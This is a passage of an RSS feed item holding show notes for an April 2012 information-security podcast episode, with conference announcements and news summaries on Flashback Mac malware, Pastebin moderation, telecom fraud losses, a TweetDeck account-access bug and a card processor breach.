	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.f-secure.com/weblog/archives/00002341.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.f-secure.com/weblog/archives/00002341.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new Flashback variant (Mac malware) has been spotted exploiting</span><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0507"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> CVE-2012-0507</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (a Java vulnerability). We&#39;ve been anticipating something like this for a while now.</span></p>
<p><img height="151px;" src="https://lh5.googleusercontent.com/5thGvpI4Vo0UG7hTenHkMIn0eR9EfHJBgxGe5yF3OId_sZ7xxudQlOaArqm8t2oU7mz_iWgakUheyKCJV4kUZaXsrgxfW1kBx3ISmk3N3FOct29QInI" width="800px;" /><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Oracle released an update that patched this vulnerability back in February&hellip; for Windows.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But &mdash; Apple hasn&#39;t released the update for OS X (yet).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It appears that the Flashback gang is keeping up with the latest in exploit kit development. Last week, Brian Krebs</span><a href="http://krebsonsecurity.com/2012/03/new-java-attack-rolled-into-exploit-packs/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> reported that the CVE-2012-0507 exploit has been incorporated into the latest version of the Blackhole exploit kit</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. And that&#39;s not all. Though it is unconfirmed, there are rumors of yet another available exploit for an &quot;as-yet unpatched critical flaw in Java&quot; on sale.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So if you haven&#39;t already disabled your Java client, please do so before this thing really become an outbreak. &nbsp;Our previous instructions on how to check whether you are infected with Flashback is still applicable. However, for this variant, there is an additional updater component that is created in the infected user&#39;s home folder. By default it is created as &quot;~/.jupdate&quot;.</span></p>
<p dir="ltr" id="internal-source-marker_0.7610479860422172" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Go to your /Users/yourusername/Library/ folder and look to see if you find any of these files:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">~/.MacOSX/environment.plist</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">~/Library/LaunchAgents/com.apple.SystemUI.plist</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">~/Library/Preferences/perflib</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">~/Library/Preferences/Preferences.dylib</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">~/Library/Logs/swlog</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you don&#39;t have any of these files, you&#39;re not infected. </span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.bbc.com/news/technology-17544311"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.bbc.com/news/technology-17544311</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The owner of Pastebin.com says he plans to hire more staff to help police &quot;sensitive information&quot; posted to the site. The website is frequently used by Anonymous and other hackers to reveal data taken from their targets. In the past this has included home addresses, email passwords and bank account details. Pastebin currently relies on an abuse report system to alert it to material that might need to be removed. Jeroen Vader, a 28 year-old Dutch entrepreneur, bought the site from its original owner in early 2010.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In that time he says he has helped grow its popularity, as it now attracts an average of 17 million unique visitors a month. The site makes money from banner adverts on its pages.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many visitors to the site use it to keep watch over trending topics. These often include articles posted by people who identify themselves as being linked to the hacktivist collective Anonymous, or related movements such as Antisec or Lulzsec. &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I think it is very important that people have access to sites like Pastebin, because it offers them total freedom of speech&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recent posts have included details of attacks on Panda Labs, the Spanish security firm; Stratfor, the security think tank; and email addresses and passwords belonging to users of the Youporn pornography sites.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.intomobile.com/2012/03/30/juniper-research-mobile-industry-lost-more-than-58-billion-last-year-due-inadequate-billing-systems/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.intomobile.com/2012/03/30/juniper-research-mobile-industry-lost-more-than-58-billion-last-year-due-inadequate-billing-systems/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a new report by Juniper Research titled &ldquo;Mobile Revenue Assurance &amp; Fraud Management: Business Strategies &amp; Forecasts 2012-2016,&rdquo; mobile telecoms industry lost over $58 billion last year (more than 6% of global revenues) due to inadequate FM (Fraud Management) and RA (Revenue Assurance) processes. The report suggests that if these processes aren&rsquo;t fixed, the scale of losses could rise five-fold by 2016.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The research company says that while operators have been obliged to integrate an ever-expanding array of devices and simultaneously manage a surge in cellular network traffic, billing systems have failed to keep pace. As a result, they are increasingly unable to accurately capture the large volume of transactions that occur on the network.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In that sense, Juniper recommends implementation of automated system solutions that provide end-to-end visibility of the revenue chain, and which could lead a net reduction of nearly $15 billion per annum compared with 2011.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some other key findings from the report include:</span></p>
<ul style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Revenue leakages will continue to be relatively higher in developing regions, particularly in Africa and the Middle East.</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Solutions are exploiting a single repository of data to reduce Total Cost of Ownership (TCO) and are integrating a number of complementary applications as the industry moves towards Business Assurance.</span></p>
</li>
</ul>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.softpedia.com/news/TweetDeck-Taken-Offline-After-User-Gains-Access-to-Hundreds-of-Accounts-262051.shtml"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/TweetDeck-Taken-Offline-After-User-Gains-Access-to-Hundreds-of-Accounts-262051.shtml</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter&rsquo;s TweetDeck, the application that &ldquo;brings more flexibility and insight to power users,&rdquo; has been taken temporarily offline after a customer from Australia noticed that he could gained access to hundreds of other accounts through the app.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;TweetDeck is currently down while we look into an issue. Apologies for the inconvenience,&rdquo; Tweetdeck representatives</span><a href="https://twitter.com/#%21/TweetDeck"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> wrote</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a few hours ago. &nbsp;</span><a href="http://techcrunch.com/2012/03/30/twitter-takes-tweetdeck-offline-after-apparent-bug-opens-access-to-accounts/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">TechCrunch</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> managed to obtain a statement from Geoff Evason, the one who identified the bug. &nbsp;&ldquo;I&rsquo;m a tweetdeck user. A bug has given me access to hundreds of twitter and facebooks account through tweetdeck. I didn&rsquo;t do anything special to make this happen. I just logged in one day, the account was was slower than normal, and I could post from many more accounts,&rdquo; Evason said.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To demonstrate the seriousness of the issue, he even performed a small test in which he took over another user&rsquo;s account from which he made a tweet. &nbsp;Approximately 8 hours after it was taken down, TweetDeck managed to address the problem and restored the service. </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">TweetDeck representatives issued a statement regarding the incident:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As soon as we learned about the issue today, we took TweetDeck down to diagnose the situation. We discovered a bug that caused a very small number of TweetDeck users to have access to other TweetDeck users&rsquo; accounts. (The accounts that could be accessed were random; it was not possible to select specific accounts and access them.)</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No one&rsquo;s password was compromised, and we aren&rsquo;t aware of any instances where this access was used maliciously. As a precaution, we removed account credentials associated with affected TweetDeck users; they will need to log in to authorize the TweetDeck application to access their accounts.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://online.wsj.com/article/SB10001424052702303816504577313411294908868.html?mod=e2tw"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://online.wsj.com/article/SB10001424052702303816504577313411294908868.html?mod=e2tw</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Concerns about credit-card security heightened Friday after a little-known Atlanta company disclosed it had been hit by hackers, potentially exposing hundreds of thousands of account holders to fraud.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The breach at Global Payments Inc. is the latest in a wave of data attacks that have heightened consumer concerns about identity theft. The card industry has been particularly vulnerable to those concerns amid a slew of big breaches in recent years as more Americans choose to pay with plastic rather than cash.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The extent of the breach couldn&#39;t be determined and it wasn&#39;t immediately clear if cardholders have seen fraudulent transactions. Consumers typically aren&#39;t liable for unauthorized purchases made on their cards.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company declined to say how many cards were at risk, but people familiar with the investigation estimated that it could be hundreds of thousands.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company said it &quot;identified and self-reported unauthorized access into a portion of its processing system.&quot; It added that in early March it &quot;determined that card data may have been accessed.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-635-flashback-variant-pastebin-monitors-lost-revenue-and-tweetdeck/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3721/0/infosec-daily-podcast-episode-635.mp3" length="17959583" type="audio/mpeg" />
		<itunes:duration>0:37:22</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 635 for April 2, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	htt[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 635 for April 2, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://www.f-secure.com/weblog/archives/00002341.html
A new Flashback variant (Mac malware) has been spotted exploiting CVE-2012-0507 (a Java vulnerability). We&#39;ve been anticipating something like this for a while now.

	&#160;
Oracle released an update that patched this vulnerability back in February&#8230; for Windows.
But &#8212; Apple hasn&#39;t released the update for OS X (yet).
It appears that the Flashback gang is keeping up with the latest in exploit kit development. Last week, Brian Krebs reported that the CVE-2012-0507 exploit has been incorporated into the latest version of the Blackhole exploit kit. And that&#39;s not all. Though it is unconfirmed, there are rumors of yet another available exploit for an &#34;as-yet unpatched critical flaw in Java&#34; on sale.
&#160;
So if you haven&#39;t already disabled your Java client, please do so before this thing really become an outbreak. &#160;Our previous instructions on how to check whether you are infected with Flashback is still applicable. However, for this variant, there is an additional updater component that is created in the infected user&#39;s home folder. By default it is created as &#34;~/.jupdate&#34;.
Go to your /Users/yourusername/Library/ folder and look to see if you find any of these files:
~/.MacOSX/environment.plist
~/Library/LaunchAgents/com.apple.SystemUI.plist
~/Library/Preferences/perflib
~/Library/Preferences/Preferences.dylib
~/Library/Logs/swlog
If you don&#39;t have any of these files, you&#39;re not infected. 
&#8230;
Source: http://www.bbc.com/news/technology-17544311
The owner of Pastebin.com says he plans to hire more staff to help police &#34;sensitive information&#34; posted to the site. The website is frequently used by Anonymous and other hackers to reveal data taken from their targets. In the past this has included home addresses, email passwords and bank account details. Pastebin currently relies on an abuse report system to alert it to material[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
